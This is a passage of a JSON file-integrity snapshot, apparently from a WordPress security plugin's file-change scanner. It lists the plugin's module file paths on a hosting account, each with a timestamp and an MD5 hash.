js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/js\\/admin-brute-force.js\":{\"d\":1535620875,\"h\":\"f8d46e51fcc0472fb880899fb50f1414\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/logs.php\":{\"d\":1535620875,\"h\":\"ffaefac1fddb3ebd4a1e026a21b81c3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/setup.php\":{\"d\":1535620875,\"h\":\"0fb3332c570ede669be0760e5efaab53\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/settings.php\":{\"d\":1535620875,\"h\":\"7699841834537531500651419741106c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/settings-page.php\":{\"d\":1535620875,\"h\":\"a586bb5c525e4a6ccbe82325b854d0e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/active.php\":{\"d\":1535620875,\"h\":\"227d82506a40b25aadfd4c12c21ab9e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/validator.php\":{\"d\":1535620875,\"h\":\"9b2df22dc03becbbe472476445e8f871\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/class-itsec-brute-force.php\":{\"d\":1535620875,\"h\":\"4d95dbdc11400bca59c4543167c9a099\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/js\\/mc-validate.js\":{\"d\":1535620875,\"h\":\"da377be172ed4b9322260112887f5b62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/img\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/class-itsec-core-admin.php\":{\"d\":1535620875,\"h\":\"d3bd2d87dedb30d8d4c58fd1f7b0c3e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/setup.php\":{\"d\":1535620875,\"h\":\"8fcfc4967c0c20dccf645a12fb07af5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/settings.php\":{\"d\":1535620875,\"h\":\"356445a023a052f59f950c618bf191db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/active.php\":{\"d\":1535620875,\"h\":\"8ee72ab5d6f447ea73bcbed0b559766d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-support.php\":{\"d\":1535620875,\"h\":\"7c7db504f9a581babd7d0f02a66f349a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-sync-cross-promo.php\":{\"d\":1535620875,\"h\":\"45f04c57a3c0ad305f1c4838ec33eb83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/validator.php\":{\"d\":1535620875,\"h\":\"ef1ffebcb18eb035abce6c6d53a8ffb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-backupbuddy-cross-promo.php\":{\"d\":1535620875,\"h\":\"b5c03cb980b8ec9b8464b58ca0123456\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-pro-upsell.php\":{\"d\":1535620875,\"h\":\"2d75c9e99a043de5c073d1a3e8e2998f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-mail-list-signup.php\":{\"d\":1535620875,\"h\":\"4850615abe7ab5b82d53b843089b8d59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/utility.php\":{\"d\":1535620875,\"h\":\"1b01b7dac81cf1b14f8743e631a762b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/settings-page.php\":{\"d\":1535620875,\"h\":\"7ed29582a652b5b1a915fdf1f1c10cc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"575d09b9e06b6b02563b3900170c7802\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/css\\/login-page.css\":{\"d\":1535620875,\"h\":\"ba73521b643df786564c09ad29270c6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/setup.php\":{\"d\":1535620875,\"h\":\"20d07b179786a496c3085f2ca7e29603\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/settings.php\":{\"d\":1535620875,\"h\":\"612d82f2b9106b46f1a1d640f7bdfe84\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/settings-page.php\":{\"d\":1535620875,\"h\":\"85971702cffefce8f8d8d9ba2693f7a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/class-itsec-hide-backend.php\":{\"d\":1535620875,\"h\":\"381b71cec1c6578d26c3d835f84c610c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/active.php\":{\"d\":1535620875,\"h\":\"8b70beeec3ff2d7e1e172c369559e1db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/validator.php\":{\"d\":1535620875,\"h\":\"7c69b0de6d6b0517bf579c7086ed1d92\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/privacy.php\":{\"d\":1535620875,\"h\":\"e520a0dfe4e654cc8cf3d805b2b0cbab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"cf42572b760ad17743d406715f190542\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-do-security-check.php\":{\"d\":1535620875,\"h\":\"c0890c1e6d5a3acc95a70a827054d9bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-get-security-check-feedback-response.php\":{\"d\":1535620875,\"h\":\"e52676550eaa7db7e1b2700357c6aa3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-get-security-check-modules.php\":{\"d\":1535620875,\"h\":\"9b511d5c20598ed6db68b9a620094624\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/settings-page.php\":{\"d\":1535620875,\"h\":\"60cf764187883b9157427c1577305308\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/feedback-renderer.php\":{\"d\":1535620875,\"h\":\"1712673c9ac1f9cedd78dff65615f1c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/active.php\":{\"d\":1535620875,\"h\":\"ad15819d8d1262e5258e9e602d0b2aa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/scanner.php\":{\"d\":1535620875,\"h\":\"1c4c10483972462b12175705c6f1ee99\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/feedback.php\":{\"d\":1535620875,\"h\":\"36579ea4cd2ca44ba36d040143b69fa0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"821c3c49ec91f31f6f7afd6ff9c20318\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/setup.php\":{\"d\":1535620875,\"h\":\"31837c4ec22bac45841c85d11fb5b9b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/settings.php\":{\"d\":1535620875,\"h\":\"af454282c7e13033adb0eb9a4a4ae399\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/settings-page.php\":{\"d\":1535620875,\"h\":\"e8bcb68e1721d86c4ee77e0ec43fa15c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/active.php\":{\"d\":1535620875,\"h\":\"f89e1edc7be7af2e875e67c21ad8f662\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/class-itsec-ssl-admin.php\":{\"d\":1535620875,\"h\":\"f4667f262b9b229fb878657892eb7e26\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/deactivate.php\":{\"d\":1535620875,\"h\":\"148c35ecb0ee92a25117c65e280eda80\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/class-itsec-ssl.php\":{\"d\":1535620875,\"h\":\"42ee6a0d4172bfb7d2143fb34fe782e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/validator.php\":{\"d\":1535620875,\"h\":\"fef2204c55be8344a7ef797a67f4aa09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/activate.php\":{\"d\":1535620875,\"h\":\"ee71fb06c2300e28351dfbfb6ae69e97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-permissions\\/settings-page.php\":{\"d\":1535620875,\"h\":\"924b5049a99b2fc7b280598a25f1a27b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-permissions\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/blankshield.min.js\":{\"d\":1535620875,\"h\":\"48bc9e9d8beb4a741f8a1a120b02d928\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/LICENSE\":{\"d\":1535620875,\"h\":\"c23e4b477e53765c6092518e5e15643f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/block-tabnapping.js\":{\"d\":1535620875,\"h\":\"57ec1ebdca32e08c4ad92587d88e4313\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/setup.php\":{\"d\":1535620875,\"h\":\"736f0c6b606f2bd92ce4a1b5b1b27cac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/settings.php\":{\"d\":1535620875,\"h\":\"06416a16b29f626b8ae8fd4ccab7127e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/settings-page.php\":{\"d\":1535620875,\"h\":\"72e14412bd0629a1baab50dd94b5d247\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/active.php\":{\"d\":1535620875,\"h\":\"36ac85d1fbcac8a1dd9ac999c039d3ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/deactivate.php\":{\"d\":1535620875,\"h\":\"54aa496c6107d14d119092aa0c30bab1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/config-generators.php\":{\"d\":1535620875,\"h\":\"b96dd312ad88d688cdd075f550b6c9bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/validator.php\":{\"d\":1535620875,\"h\":\"207b1ac655cb917527864ccda87bd819\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/activate.php\":{\"d\":1535620875,\"h\":\"15f144ec7d33b7ed1e3b37cfbc860a7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/class-itsec-wordpress-tweaks.php\":{\"d\":1535620875,\"h\":\"cddf195b0a6627aeebd18e284c9e32b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/setup.php\":{\"d\":1535620875,\"h\":\"ab25dba7ce4b4e4edadc1857a9b2184b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/class-itsec-system-tweaks.php\":{\"d\":1535620875,\"h\":\"d45c1877b58fda6bcfc9e772e44f45f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/settings.php\":{\"d\":1535620875,\"h\":\"c13a5df1c2eb71b602e7989431ad74c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/settings-page.php\":{\"d\":1535620875,\"h\":\"3944290d703e096d127bf3083d4c7cdb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/active.php\":{\"d\":1535620875,\"h\":\"3778470393a87b7e373320ac7bd4c589\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/deactivate.php\":{\"d\":1535620875,\"h\":\"64b65c1e19cf17eb91417c27b3b2426f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/config-generators.php\":{\"d\":1535620875,\"h\":\"6a9440df3ab42f8430fa57d14b5c033d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/validator.php\":{\"d\":1535620875,\"h\":\"a374f065f625b90b1b1e1c0bf79ee709\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/activate.php\":{\"d\":1535620875,\"h\":\"c028cc2b3058437a109a177b36c40f34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/js\\/admin-ban_users.js\":{\"d\":1535620875,\"h\":\"a25c79323346673ea6b30b10fa1d91e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-apache.inc\":{\"d\":1535620875,\"h\":\"a0b5f34242041d417159a5f87360b7b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-nginx.inc\":{\"d\":1535620875,\"h\":\"73da803b78ad471c38d4fe757191d3c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-litespeed.inc\":{\"d\":1535620875,\"h\":\"a0b5f34242041d417159a5f87360b7b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/setup.php\":{\"d\":1535620875,\"h\":\"f6b57072c10a607c7493e54b2f70805a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/settings.php\":{\"d\":1535620875,\"h\":\"fb7472e5a89d9a219f158cab66184ac4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/settings-page.php\":{\"d\":1535620875,\"h\":\"08dd1ad13afce02aab169e05ef1531c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/active.php\":{\"d\":1535620875,\"h\":\"b86621b40a86330cb4c4b3c327668051\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/deactivate.php\":{\"d\":1535620875,\"h\":\"00fc522a16fad1e431ca003e3a6d9566\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/config-generators.php\":{\"d\":1535620875,\"h\":\"925f5cb254d0c2658d061de74409cc06\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/validator.php\":{\"d\":1535620875,\"h\":\"57b7d8a2e248d83a9320c3008e4c4f83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/class-itsec-ban-users.php\":{\"d\":1535620875,\"h\":\"5ee50afb675c3b1efbcaa9b1c873f02b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/activate.php\":{\"d\":1535620875,\"h\":\"801124f95930f49eca073618b760188c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/init.php\":{\"d\":1535620875,\"h\":\"cb36189ae26353203fd28aa54f13796d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/images\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/jqueryFileTree.css\":{\"d\":1535620875,\"h\":\"60f395cd20597c1609bea2fc572d3d4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/jqueryFileTree.js\":{\"d\":1535620875,\"h\":\"36548e752f6a754125c83b86afed099f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/script.js\":{\"d\":1535620875,\"h\":\"ad7b6c35cbe3adcc594b23721161b792\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/admin-file-change-warning.js\":{\"d\":1535620875,\"h\":\"892b85a2b487aeb8f07ece552a6f8924\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"8b32bd371658efcdb79701e9f3d2b57f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/file-scanner.js\":{\"d\":1535620875,\"h\":\"e129823497a9e2c01b8f6b259a363315\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/itsec-perform-file-scan.php\":{\"d\":1535620875,\"h\":\"a07ffb2041103a2d625c4c2835b5b19c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/itsec-ping-file-scan.php\":{\"d\":1535620875,\"h\":\"8f9d30825073324d7a22d7ba2579310b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/images\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-managed-files.php\":{\"d\":1535620875,\"h\":\"2ad63bb669ce7f9fd00c3c89e6f39f16\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package.php\":{\"d\":1535620875,\"h\":\"0c7b6a4bc578ddbc73a68cb0ab3c1e40\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/chunk-scanner.php\":{\"d\":1535620875,\"h\":\"dc923761f8a33bc253f0bdef951f2497\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-factory.php\":{\"d\":1535620875,\"h\":\"b5dede76087a6b4be5b4c5bf2f9bebc5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-loading-failed-exception.php\":{\"d\":1535620875,\"h\":\"edca712836606ff2d7f438195ab247b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator.php\":{\"d\":1535620875,\"h\":\"7b44f481bd5a372ebd3925005ee13691\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-theme.php\":{\"d\":1535620875,\"h\":\"11533bae2660ad42bafbf98b6fc202bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-unknown.php\":{\"d\":1535620875,\"h\":\"bda07a78a8ef8123023303e2734bbb23\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-loadable.php\":{\"d\":1535620875,\"h\":\"570e8284c48f57717ba86ef3eeb54c16\"},\"\\/home2\\/zphiblgz\\/public_h